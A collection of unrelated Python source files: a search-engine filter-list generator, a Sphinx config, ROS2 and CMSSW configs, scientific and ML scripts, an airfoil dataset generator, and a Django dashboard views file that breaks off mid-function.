from glob import glob from pathlib import Path LINE_SEP = "\n" def to_css_attr(url): return url.replace("*://", "").replace("*.", ".").replace("/*", "") def to_google(url): return f'google.*##.g:has(a[href*="{to_css_attr(url)}"])' def to_duckduckgo(url): return f'duckduckgo.*##.results > div:has(a[href*="{to_css_attr(url)}"])' def to_brave(url): return f'search.brave.com###results > div:has(a[href*="{to_css_attr(url)}"])' def to_startpage(url): return f'startpage.com##.w-gl__result:has(a[href*="{to_css_attr(url)}"])' def main(): root_path = Path(__file__).parent.joinpath("../") dist_path = root_path.joinpath("dist") tmp_txt = dist_path.joinpath("tmp.txt") g_all = dist_path.joinpath("google", "all.txt") d_all = dist_path.joinpath("duckduckgo", "all.txt") gd_all = dist_path.joinpath("google_duckduckgo", "all.txt") b_all = dist_path.joinpath("brave", "all.txt") sp_all = dist_path.joinpath("startpage", "all.txt") for f in [g_all, d_all, gd_all, b_all, sp_all]: f.parent.mkdir(parents=True, exist_ok=True) with g_all.open("w") as g_all, \ d_all.open("w") as d_all, \ gd_all.open("w") as gd_all, \ b_all.open("w") as b_all, \ sp_all.open("w") as sp_all: for file in root_path.joinpath("data").glob("*.txt"): filename = file.name.split(".")[0] # Sort and find duplicates with file.open("r") as i, tmp_txt.open("w") as tmp: already_in = set() for line in i: if line.startswith("!") or not line.strip(): tmp.write(line) continue url = line.strip() if url in already_in: print(f"Find duplicate: {url}. Skip!") continue else: already_in.add(url) tmp.write(line) tmp_txt.replace(file) with dist_path.joinpath("google", f"{filename}.txt").open("w") as g, \ dist_path.joinpath("duckduckgo", f"{filename}.txt").open("w") as d, \ dist_path.joinpath("google_duckduckgo", f"{filename}.txt").open("w") as gd, \ dist_path.joinpath("brave", f"{filename}.txt").open("w") as b, \ dist_path.joinpath("startpage", f"{filename}.txt").open("w") as sp, \ file.open("r") as i: for line in i: if line.startswith("!") or not line.strip(): continue url = line.strip() for f in [ g, g_all, d, d_all, gd, gd_all, b, b_all, sp, sp_all ]: f.write(url + LINE_SEP) url_google = to_google(url) url_duckduckgo = to_duckduckgo(url) url_brave = to_brave(url) url_sp = to_startpage(url) for f in [ g, g_all, gd, gd_all ]: f.write(url_google + LINE_SEP) for f in [ d, d_all, gd, gd_all ]: f.write(url_duckduckgo + LINE_SEP) for f in [ b, b_all ]: f.write(url_brave + LINE_SEP) for f in [ sp, sp_all ]: f.write(url_sp + LINE_SEP) if __name__ == "__main__": main()
py
7dfcf02074e61c87bae35f30119dc90806eff293
# -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. For a # full list see the documentation: # http://www.sphinx-doc.org/en/master/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. import json import os import sys from datetime import date from os import path def read(filename): here = path.dirname(path.abspath(__file__)) with open(path.join(here, filename)) as fd: return fd.read() def find_version(filename): """ Find package version in file. """ import re content = read(filename) version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", content, re.M) if version_match: return version_match.group(1) raise RuntimeError("Unable to find version string.") # print('current path', path.abspath('.')) sys.path.insert(0, path.abspath("../..")) # print(sys.path) # -- Project information ----------------------------------------------------- project = "CogDL" years = "2019-{}".format(date.today().year) author = "CogDL Team, KEG" copyright = "{}, {}".format(years, author) # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. __version__ = find_version("../../cogdl/__init__.py") # The short X.Y version. version = __version__ # The full version, including alpha/beta/rc tags. release = __version__ # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ "sphinx.ext.autosummary", "sphinx.ext.autodoc", "sphinx.ext.doctest", "sphinx.ext.intersphinx", "sphinx.ext.todo", "sphinx.ext.coverage", "sphinx.ext.mathjax", "sphinx.ext.ifconfig", "sphinx.ext.viewcode", "sphinx.ext.githubpages", "sphinx.ext.napoleon", "recommonmark", "sphinx_markdown_tables", ] # generate autosummary pages autosummary_generate = True # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = [".rst", ".md"] # source_suffix = ".rst" # The master toctree document. master_doc = "index" # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = [] # The name of the Pygments (syntax highlighting) style to use. pygments_style = None # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = "sphinx_rtd_theme" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ["_static"] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don't match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``['localtoc.html', 'relations.html', 'sourcelink.html', # 'searchbox.html']``. # # html_sidebars = {} # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = "CogDLdoc" # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [(master_doc, "CogDL.tex", "CogDL Documentation", "KEG", "manual")] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [(master_doc, "cogdl", "CogDL Documentation", [author], 1)] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( master_doc, "CogDL", "CogDL Documentation", author, "CogDL", "One line description of project.", "Miscellaneous", ) ] # -- Options for Epub output ------------------------------------------------- # Bibliographic Dublin Core info. epub_title = project # The unique identifier of the text. This can be a ISBN number # or the project homepage. # # epub_identifier = '' # A unique identification for the text. # # epub_uid = '' # A list of files that should not be packed into the epub file. epub_exclude_files = ["search.html"] # -- Extension configuration ------------------------------------------------- # -- Options for intersphinx extension --------------------------------------- # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = {"https://docs.python.org/": None} # -- Options for todo extension ---------------------------------------------- # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = True
py
7dfcf223d9941cc09c5cff19fb4f7679c74498ab
import os import yaml from ament_index_python.packages import get_package_share_directory from launch import LaunchDescription from launch_ros.actions import Node def generate_launch_description(): # load crazyflies crazyflies_yaml = os.path.join( get_package_share_directory('crazyswarm2'), 'config', 'crazyflies.yaml') with open(crazyflies_yaml, 'r') as ymlfile: crazyflies = yaml.safe_load(ymlfile) # load crazyflie_types crazyflies_types_yaml = os.path.join( get_package_share_directory('crazyswarm2'), 'config', 'crazyflie_types.yaml') with open(crazyflies_types_yaml, 'r') as ymlfile: crazyflie_types = yaml.safe_load(ymlfile) # construct motion_capture_configuration motion_capture_yaml = os.path.join( get_package_share_directory('crazyswarm2'), 'config', 'motion_capture.yaml') with open(motion_capture_yaml, 'r') as ymlfile: motion_capture = yaml.safe_load(ymlfile) motion_capture_params = motion_capture["/motion_capture_tracking"]["ros__parameters"] motion_capture_params["rigid_bodies"] = dict() for key, value in crazyflies.items(): type = crazyflie_types[value["type"]] motion_capture_params["rigid_bodies"][key] = { "initial_position": value["initial_position"], "marker": type["marker"], "dynamics": type["dynamics"], } # construct crazyswarm2_server configuration server_yaml = os.path.join( get_package_share_directory('crazyswarm2'), 'config', 'crazyswarm2_server.yaml') with open(server_yaml, 'r') as ymlfile: server_params = yaml.safe_load(ymlfile) server_params = server_params["/crazyswarm2_server"]["ros__parameters"] server_params["crazyflies"] = crazyflies server_params["crazyflie_types"] = crazyflie_types # teleop params teleop_yaml = os.path.join( get_package_share_directory('crazyswarm2'), 'config', 'teleop.yaml') return LaunchDescription([ Node( package='motion_capture_tracking', executable='motion_capture_tracking_node', name='motion_capture_tracking', output='screen', parameters=[motion_capture_params] ), Node( package='crazyswarm2', executable='teleop', name='teleop', # remappings=[ # ('takeoff', 'cf3/takeoff'), # ('land', 'cf3/land'), # ('cmd_vel', 'cf3/cmd_vel') # ], parameters=[teleop_yaml] ), Node( package='joy', executable='joy_node', name='joy_node', ), Node( package='crazyswarm2', executable='crazyswarm2_server', name='crazyswarm2_server', output='screen', parameters=[server_params] ), ])
py
7dfcf2296cdb8af5d443a2317dbadfb77a876738
import time from matplotlib.lines import Line2D import numpy as np from vis.ScatterVisualizer import ScatterVisualizer class Path2DVis(ScatterVisualizer): class __Path2DVis(ScatterVisualizer): """ scatter-plot lines for shortes path-visualisation """ def __init__(self, xymin=-50,xymax=1100, num_runs=1, offset=50,interactive=True, sleep_interval=0): """ :param xymin: :param xymax: -> das is käse :param num_runs: :param offset: :param interactive: :param sleep_interval: """ super().__init__(interactive=interactive, xlim=0, ylim=0, offset=offset, log_scale=False, sexify=False) self.set_yx_lim([xymin, xymax], [xymin, xymax]) self.num_runs = num_runs self.sleep_interval = sleep_interval self.my_plot.set_edgecolor('white') def set_point_size(self, point_size=12.5): """ :param point_size: :return: """ self.plot.set_sizes([point_size] * len(self.target_array)) def plot_path(self, x=[], y=[]): """ :param x: :param y: :return: """ self.ax.add_line(Line2D(x, y)) self.set_yx_lim([np.min(x) - self.offset, np.max(x) + self.offset], [np.min(y) - self.offset, np.max(y) + self.offset]) # plt.savefig("/home/tobias/Bilder/tsp/path"+str(iteration)+".png") self.fig.canvas.draw() time.sleep(self.sleep_interval) while True: # bisschen unschoen. try: self.ax.lines[0].remove() except IndexError: break instance = None def __init__(self, xymin=-50, xymax=1100, num_runs=1, offset=50, interactive=True, sleep_interval=0): if not Path2DVis.instance: Path2DVis.instance = Path2DVis.__Path2DVis(xymin,xymax, num_runs, offset, interactive, sleep_interval) def __getattr__(self, name): return getattr(self.instance, name)
py
7dfcf32e60d5920d589951da37307e798f0735f0
# coding: utf-8 """ LUSID API FINBOURNE Technology # noqa: E501 The version of the OpenAPI document: 0.11.3725 Contact: [email protected] Generated by: https://openapi-generator.tech """ try: from inspect import getfullargspec except ImportError: from inspect import getargspec as getfullargspec import pprint import re # noqa: F401 import six from lusid.configuration import Configuration class TransactionPrice(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. required_map (dict): The key is attribute name and the value is whether it is 'required' or 'optional'. """ openapi_types = { 'price': 'float', 'type': 'str' } attribute_map = { 'price': 'price', 'type': 'type' } required_map = { 'price': 'optional', 'type': 'optional' } def __init__(self, price=None, type=None, local_vars_configuration=None): # noqa: E501 """TransactionPrice - a model defined in OpenAPI" :param price: :type price: float :param type: The available values are: Price, Yield, Spread :type type: str """ # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration.get_default_copy() self.local_vars_configuration = local_vars_configuration self._price = None self._type = None self.discriminator = None if price is not None: self.price = price if type is not None: self.type = type @property def price(self): """Gets the price of this TransactionPrice. # noqa: E501 :return: The price of this TransactionPrice. # noqa: E501 :rtype: float """ return self._price @price.setter def price(self, price): """Sets the price of this TransactionPrice. :param price: The price of this TransactionPrice. # noqa: E501 :type price: float """ self._price = price @property def type(self): """Gets the type of this TransactionPrice. # noqa: E501 The available values are: Price, Yield, Spread # noqa: E501 :return: The type of this TransactionPrice. # noqa: E501 :rtype: str """ return self._type @type.setter def type(self, type): """Sets the type of this TransactionPrice. The available values are: Price, Yield, Spread # noqa: E501 :param type: The type of this TransactionPrice. # noqa: E501 :type type: str """ allowed_values = ["Price", "Yield", "Spread"] # noqa: E501 if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501 raise ValueError( "Invalid value for `type` ({0}), must be one of {1}" # noqa: E501 .format(type, allowed_values) ) self._type = type def to_dict(self, serialize=False): """Returns the model properties as a dict""" result = {} def convert(x): if hasattr(x, "to_dict"): args = getfullargspec(x.to_dict).args if len(args) == 1: return x.to_dict() else: return x.to_dict(serialize) else: return x for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) attr = self.attribute_map.get(attr, attr) if serialize else attr if isinstance(value, list): result[attr] = list(map( lambda x: convert(x), value )) elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], convert(item[1])), value.items() )) else: result[attr] = convert(value) return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, TransactionPrice): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, TransactionPrice): return True return self.to_dict() != other.to_dict()
py
7dfcf4ec628a67da23e83dd71ddaa0e97e3f457b
# -*- coding: utf-8 -*- # Copyright (c) 2018, VHRS and Contributors # See license.txt from __future__ import unicode_literals import frappe import unittest class TestCandidateRegistration(unittest.TestCase): pass
py
7dfcf4ed98b0775474e898424b8de8c211ec99d2
import pygame from pygame_markdown.PygameMarkdown import MarkdownRenderer # minimal pygame setup pygame.init() screenHeight = 900 screenWidth = 600 screen = pygame.display.set_mode((screenWidth, screenHeight)) pygame.display.set_caption("Pygame") pygame.display.get_surface().fill((200, 200, 200)) # background coloring # parameters surface = pygame.display.get_surface() # get existing pygame window/screen offset_X = 50 # offset from the left border of the pygame window offset_Y = 20 # offset from the top border of the pygame window textAreaHeight = 800 textAreaWidth = 500 mdfile_path = "README_test.md" md = MarkdownRenderer() md.set_markdown(mdfile_path) md.set_area(surface, offset_X, offset_Y, textAreaWidth, textAreaHeight) # OPTIONAL #md.set_scroll_step(25) #md.set_line_gaps(8, 35) #md.set_font_sizes(28, 24, 20, 16, 16, 16) md.set_font('Arial', 'CourierNew') md.set_color_background(204, 204, 204) md.set_color_code_background(42, 157, 143) md.set_color_font(41, 50, 65) md.set_color_hline(41, 50, 65) #md.set_color_quote(41, 50, 65) while True: pygame.draw.rect(screen, (255,255, 255), (0, 0, screenWidth, screenHeight)) # get various input from pygame pygame_events = pygame.event.get() mouse_x, mouse_y = pygame.mouse.get_pos() mouse_pressed = pygame.mouse.get_pressed() for event in pygame_events: # handle QUIT operation if event.type == pygame.QUIT: pygame.quit() exit() md.color_font = (41, 50, 65) md.display(pygame_events, mouse_x, mouse_y, mouse_pressed) # renders the markdown text onto the surface. pygame.display.flip() # updates pygame window
py
7dfcf58e148435f3b01281d89b3a507bfe899de8
''' Denoising Autoencoder on MNIST using Keras keras 2.0.6 ''' import pandas as pd import numpy as np np.random.seed(1337) # for reproducibility from keras import backend as K from keras.models import Model from keras.layers import Input, UpSampling2D from keras.layers.convolutional import Conv2D, MaxPooling2D from keras.callbacks import Callback, RemoteMonitor from keras.utils import np_utils from keras.utils.layer_utils import print_summary # enable multi-CPU import theano theano.config.openmp = True monitor = RemoteMonitor(root='http://localhost:9000') # input image dimensions img_rows, img_cols = 28, 28 batch_size = 128 # Number of images used in each optimization step nb_classes = 10 # One class per digit nb_epoch = 70 # Number of times the whole data is used to learn # Read the train and test datasets train = pd.read_csv("mnist/train.csv").values test = train # output = input print('train shape:', train.shape) print('test shape:', test.shape) # Reshape the data to be used by a Theano CNN. Shape is # (nb_of_samples, nb_of_color_channels, img_width, img_heigh) X_train = train[:, 1:].reshape(train.shape[0], 1, img_rows, img_cols) X_test = test[:, 1:].reshape(test.shape[0], 1, img_rows, img_cols) in_shape = (1, img_rows, img_cols) print('in shape:', in_shape) # Make the value floats in [0;1] instead of int in [0;255] X_train = X_train.astype('float32') X_test = X_test.astype('float32') X_train /= 255 X_test /= 255 #Display the shapes to check if everything's ok print('X_train shape:', X_train.shape) print('X_test shape:', X_test.shape) input_img = Input(shape=in_shape) # adapt this if using non `channels_first` image data format x = Conv2D(16, kernel_size=(3,3), activation='relu', padding='same')(input_img) x = MaxPooling2D((2, 2), padding='same')(x) x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x) x = MaxPooling2D((2, 2), padding='same')(x) x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x) encoded = MaxPooling2D((2, 2), padding='same')(x) # at this point the representation is (4, 4, 8) i.e. 128-dimensional x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(encoded) x = UpSampling2D((2, 2))(x) x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x) x = UpSampling2D((2, 2))(x) x = Conv2D(16, kernel_size=(3,3), activation='relu')(x) x = UpSampling2D((2, 2))(x) decoded = Conv2D(1, kernel_size=(3,3), activation='sigmoid', padding='same')(x) autoencoder = Model(input_img, decoded) autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy') print_summary(autoencoder) autoencoder.fit(X_train, X_train, epochs=50, batch_size=128, shuffle=True, validation_data=(X_test, X_test))
py
7dfcf75f437fca1d887d5979225c7c143f88dd8e
import matplotlib.pyplot as plt import numpy as np import scipy.interpolate as spln import pyDOE as pd import matplotlib.animation as anime import sys import Images_Generator as ig import shutil import os """ Airfoil_DataSet_Generator_Randomizer.py --------------------------------------------- This program is used to create a full Database of airfoil variants based on the RAE-2822 airfoil. The program requires from the user to enter the mother foil's data as an ASCII or UTF-8 text base format along with its full directory and the target directory where all the data would be stored. An optional argument is to enter '-v' after the obligatory arguments in order to get a visual representation of the Database that was created. This code shall be used only once per batch as there is no control over the random pattern ganeration and any new results may not be the same as the old ones. revision 1: Altered the text data export to facilitate the deformation of the grids and charged this program with the duty of creating the proper data structure to hold the variants' .geom files and their respective sdf format images. (6/2021) Developed by Konstantinos Rekoumis 12/2020 (School of Naval and Marine Engineering NTUA) """ #------------- Functions definitions ----------------------------------- def randomizer_ControlPoints(tck,n): #inputs are the knotvector , Control Points, the splines grade and the number of samples need to be created kn=tck[0] CP=np.array(tck[1]) k=tck[2] s1 = pd.lhs(n,samples = 1) s=[-0.2+0.4*x for x in s1[0,:]] CP_temp = [] TCK = [] for i in range(n): for j in range(len(CP[0])): CP_temp.append((1+s[i])*CP[1,j]) TCK.append([kn,[CP[0,:],CP_temp],k]) CP_temp =[] return TCK def spline_fitting(points,samples,k=3,s=0): # ------- B-spline preping ---------- tck,u = spln.splprep([points[:,0],points[:,1]],k=3,s=0) # ----- Control Points Manipulation-------- CP = np.array(tck[1]) TCK=randomizer_ControlPoints(tck,samples) # ------- B-splines fitting ---------- # u = np.linspace(0,1,100) splines = [spln.splev(u,TCK[i]) for i in range(samples)] return splines def ran_plot(i): if i<samples: line1.set_ydata(up_sides[i][1]) line2.set_ydata(down_sides[i][1]) return line1, line2, #---------------------------------------------------------------------------- if("__main__"==__name__): #---------- Open the airfoil file for data entry ---------------------------- #------ RAE 2822 via Online data (Legacy still working tho) ----------------- # points_up = np.zeros((1,2),dtype="float") # points_down = np.zeros((1,2),dtype="float") # vv="down" # samples = 500 # data = open("RAE_2822.txt") # for line in data: # if ('0' in line): # bits=line.split(' ') #text separation # bits[2]=bits[2].split('\n')[0] #newline char trim # if (("0.000000" == bits[1]) & ("0.000000" == bits[2]) & (vv!="down")): vv ="down" # elif(("0.000000" == bits[1]) & ("0.000000" == bits[2]) & (vv=="down")): vv ="up" # if (vv == "up"): # points_up=np.append(points_up,[[float(bits[1]),float(bits[2])]],axis=0) # else: # points_down=np.append(points_down,[[float(bits[1]),float(bits[2])]],axis=0) # # #getting rid of the zeros of the initialization # points_up=np.delete(points_up,0,0) # points_down=np.delete(points_down,0,0) #------ RAE 2822 via mesh points sorting (New) -------------------------------- if (len(sys.argv)>=2): input = sys.argv[1] if(len(sys.argv)==3): directory = sys.argv[2] else: print("Enter the Database destination directory:") directory = input() else: print("Enter the Mother Foil\'s .geom file name:") input = input() points_up = np.zeros((1,2),dtype="float") points_down = np.zeros((1,2),dtype="float") vv="up" samples = 1500 index = [] data = open(input,"r") lines=data.readlines() lines.pop(0)#first line usefull only for MaPFlow for line in lines: bits=line.split(" ") index.append(bits[0]) if (points_up[-1,1]>0)and(float(bits[2])<0):vv="down" if vv=="up": points_up=np.append(points_up,[[float(bits[1]),float(bits[2])]],axis=0) elif vv=="down": points_down=np.append(points_down,[[float(bits[1]),float(bits[2])]],axis=0) #appointing the spline end points points_up=np.append(points_up,[[1.0,0.0]],axis=0) points_down=np.append(points_down,[[0.0,0.0]],axis=0) points_up=np.delete(points_up,0,0) # points_down=np.delete(points_down,0,0) up_sides=spline_fitting(points_up,samples) down_sides=spline_fitting(points_down,samples) #------------------------------------------------ # # ------ Visualising Area ------------ if (len(sys.argv)==4)and(sys.argv[3] == "-v"): fig = plt.figure() plt.plot(points_up[:,0],points_up[:,1],"ro") plt.plot(points_down[:,0],points_down[:,1],"b*") fig2 = plt.figure() for i in range(samples): plt.plot(up_sides[i][0],up_sides[i][1]) plt.plot(down_sides[i][0],down_sides[i][1]) fig1,ax=plt.subplots() line1,=ax.plot(up_sides[0][0],up_sides[0][1]) line2,=ax.plot(down_sides[0][0],down_sides[0][1]) plt.axis([-0.1,1.1,-0.5,0.5]) animation=anime.FuncAnimation(fig1,ran_plot,blit=False) plt.show() #----------- Data Export ----------------- # # windows test mode---------------------------------- # directory = "C:\\AA_NeuralNetwork_ImagesFolder\\" # train = "train\\" # test = "test\\" # Linux mode -------------------------- # directory = "~/DiplomaThesisData/" train ="train/" test ="test/" DIRS = "" #Create ROOT Directory try: os.mkdir(directory) print(f"The directory: {directory} has been made.") except: print(f"The directory: {directory} already exists.") try: os.mkdir(directory+train) print(f"The directory: {directory+train} has been made.") except: print(f"The directory: {directory+train} already exists.") try: os.mkdir(directory+test) print(f"The directory: {directory+test} has been made.") except: print(f"The directory: {directory+test} already exists.") for i in range(samples): dir ="" if i < int(2*samples/3): dir = f"{directory+train}#_{i}/" elif i >= int(2*samples/3): dir = f"{directory+test}#_{i}/" try: os.mkdir(dir) except: shutil.rmtree(dir,ignore_errors=True) os.mkdir(dir) DIRS += f"{dir}\n" # lines="" text=[f"#variant no.{i}\n"] for j in range(0,len(up_sides[i][0])-1): # lines += f"{index[j-1]} {up_sides[i][0][j]} {up_sides[i][1][j]}\n" text.append(f"{up_sides[i][0][j]} {up_sides[i][1][j]}\n") for j in range(1,len(down_sides[i][0])-1): # lines += f"{index[j+len(up_sides[i][0])-3]} {down_sides[i][0][j]} {down_sides[i][1][j]}\n" text.append(f"{down_sides[i][0][j]} {down_sides[i][1][j]}\n") # lines+="----------- EOF ---------------------" text.append("----------- EOF ---------------------") #data export as var.geom file for use with grid manipulation with open((dir+f"var.geom"),'w') as file: # file.write(lines) for line in text: file.write(line) #image data export ig.ImageDatabase(dir,text) with open("/home/freshstart/DiplomaThesisData/DIRS",'w') as file: file.write(DIRS)
py
7dfcf82ed2332e403bb3a8f500d8599706e577d3
from __future__ import print_function, division import numpy as np from openmdao.api import ExplicitComponent try: from openaerostruct.fortran import OAS_API fortran_flag = True data_type = float except: fortran_flag = False data_type = complex class StructuralCG(ExplicitComponent): """ Compute center-of-gravity location of the spar elements. parameters ---------- A[ny-1] : numpy array Areas for each FEM element. nodes[ny, 3] : numpy array Flattened array with coordinates for each FEM node. Returns ------- structural_weight : float Weight of the structural spar. cg_location[3] : numpy array Location of the structural spar's cg. """ def initialize(self): self.options.declare('surface', types=dict) def setup(self): self.surface = surface = self.options['surface'] self.ny = surface['num_y'] self.add_input('nodes', val=np.zeros((self.ny, 3)), units='m')#, dtype=data_type)) self.add_input('structural_weight', val=0., units='N') self.add_input('element_weights', val=np.zeros((self.ny-1)), units='N') self.add_output('cg_location', val=np.zeros((3)), units='m')#, dtype=data_type)) self.declare_partials('*', '*', method='cs') def compute(self, inputs, outputs): nodes = inputs['nodes'] structural_weight = inputs['structural_weight'] element_weights = inputs['element_weights'] # Calculate the center-of-gravity location of the spar elements only center_of_elements = (nodes[1:, :] + nodes[:-1, :]) / 2. cg_loc = np.sum(center_of_elements.T * element_weights, axis=1) / structural_weight # If the tube is symmetric, double the computed weight and set the # y-location of the cg to 0, at the symmetry plane if self.surface['symmetry']: cg_loc[1] = 0. cg_loc *= 2. outputs['cg_location'] = cg_loc def compute_partials(self, inputs, partials): nodes = inputs['nodes'] structural_weight = inputs['structural_weight'] element_weights = inputs['element_weights']
py
7dfcf98b7910219e34eea892a357453b76030859
import FWCore.ParameterSet.Config as cms from Configuration.Eras.Era_Run3_dd4hep_cff import Run3_dd4hep process = cms.Process("TrackerParametersTest", Run3_dd4hep) process.load('Configuration.Geometry.GeometryDD4hepExtended2021Reco_cff') if 'MessageLogger' in process.__dict__: process.MessageLogger.categories.append('TrackerParametersAnalyzer') process.MessageLogger.destinations.append('cout') process.MessageLogger = cms.Service("MessageLogger", cerr = cms.untracked.PSet( enable = cms.untracked.bool(False) ), cout = cms.untracked.PSet( INFO = cms.untracked.PSet( limit = cms.untracked.int32(-1) ), TrackerParametersAnalyzer = cms.untracked.PSet( limit = cms.untracked.int32(-1) ), enable = cms.untracked.bool(True), enableStatistics = cms.untracked.bool(True), noLineBreaks = cms.untracked.bool(True), threshold = cms.untracked.string('INFO') ), files = cms.untracked.PSet( trackerParametersDD4hep = cms.untracked.PSet( DEBUG = cms.untracked.PSet( limit = cms.untracked.int32(0) ), ERROR = cms.untracked.PSet( limit = cms.untracked.int32(0) ), FWKINFO = cms.untracked.PSet( limit = cms.untracked.int32(0) ), INFO = cms.untracked.PSet( limit = cms.untracked.int32(0) ), TrackerParametersAnalyzer = cms.untracked.PSet( limit = cms.untracked.int32(-1) ), WARNING = cms.untracked.PSet( limit = cms.untracked.int32(0) ), noLineBreaks = cms.untracked.bool(True), threshold = cms.untracked.string('INFO') ) ) ) process.source = cms.Source("EmptySource") process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) ) process.test = cms.EDAnalyzer("TrackerParametersAnalyzer") process.Timing = cms.Service("Timing") process.SimpleMemoryCheck = cms.Service("SimpleMemoryCheck") process.p1 = cms.Path(process.test)
py
7dfcfa278cd1e9da40ca76e54fbe87830ba3dc17
__author__ = """Jelle Spijker""" __email__ = '[email protected]' __version__ = '0.1.0' from pint import UnitRegistry, set_application_registry ureg = UnitRegistry(autoconvert_offset_to_baseunit=True, default_as_delta=False) ureg.setup_matplotlib(True) Q_ = ureg.Quantity set_application_registry(ureg)
py
7dfcfb3c9e9bb36308e4f6c810fb68bb6d6349c5
from __future__ import unicode_literals from django.contrib import messages from django.core.urlresolvers import reverse from django.shortcuts import get_object_or_404, redirect from django.template.response import TemplateResponse from django.utils.http import is_safe_url from django.utils.translation import pgettext_lazy from django.views.decorators.http import require_http_methods from . import forms from ...core.utils import get_paginator_items from ...product.models import (Product, ProductAttribute, ProductClass, ProductImage, ProductVariant, Stock, StockLocation) from ..views import staff_member_required @staff_member_required def product_class_list(request): classes = ProductClass.objects.all().prefetch_related( 'product_attributes', 'variant_attributes') form = forms.ProductClassForm(request.POST or None) if form.is_valid(): return redirect('dashboard:product-class-add') classes = get_paginator_items(classes, 30, request.GET.get('page')) classes.object_list = [ (pc.pk, pc.name, pc.has_variants, pc.product_attributes.all(), pc.variant_attributes.all()) for pc in classes.object_list] ctx = {'form': form, 'product_classes': classes} return TemplateResponse(request, 'dashboard/product/class_list.html', ctx) @staff_member_required def product_class_create(request): product_class = ProductClass() form = forms.ProductClassForm(request.POST or None, instance=product_class) if form.is_valid(): product_class = form.save() msg = pgettext_lazy( 'Dashboard message', 'Added product type %s') % product_class messages.success(request, msg) return redirect('dashboard:product-class-list') ctx = {'form': form, 'product_class': product_class} return TemplateResponse( request, 'dashboard/product/product_class_form.html', ctx) @staff_member_required def product_class_edit(request, pk): product_class = get_object_or_404( ProductClass, pk=pk) form = forms.ProductClassForm(request.POST or None, instance=product_class) if form.is_valid(): product_class = form.save() msg = pgettext_lazy( 'Dashboard message', 'Updated product type %s') % product_class messages.success(request, msg) return redirect('dashboard:product-class-update', pk=pk) ctx = {'form': form, 'product_class': product_class} return TemplateResponse( request, 'dashboard/product/product_class_form.html', ctx) @staff_member_required def product_class_delete(request, pk): product_class = get_object_or_404(ProductClass, pk=pk) products = [str(p) for p in product_class.products.all()] if request.method == 'POST': product_class.delete() messages.success( request, pgettext_lazy( 'Dashboard message', 'Deleted product type %s') % product_class) return redirect('dashboard:product-class-list') return TemplateResponse( request, 'dashboard/product/modal_product_class_confirm_delete.html', {'product_class': product_class, 'products': products}) @staff_member_required def product_list(request): products = Product.objects.prefetch_related('images') product_classes = ProductClass.objects.all() form = forms.ProductClassSelectorForm( request.POST or None, product_classes=product_classes) if form.is_valid(): return redirect('dashboard:product-add', class_pk=form.cleaned_data['product_cls']) products = get_paginator_items(products, 30, request.GET.get('page')) ctx = {'form': form, 'products': products, 'product_classes': product_classes} return TemplateResponse(request, 'dashboard/product/list.html', ctx) @staff_member_required def product_create(request, class_pk): product_class = get_object_or_404(ProductClass, pk=class_pk) create_variant = not product_class.has_variants product = Product() product.product_class = product_class product_form = forms.ProductForm(request.POST or None, instance=product) if create_variant: variant = ProductVariant(product=product) variant_form = forms.ProductVariantForm(request.POST or None, instance=variant, prefix='variant') variant_errors = not variant_form.is_valid() else: 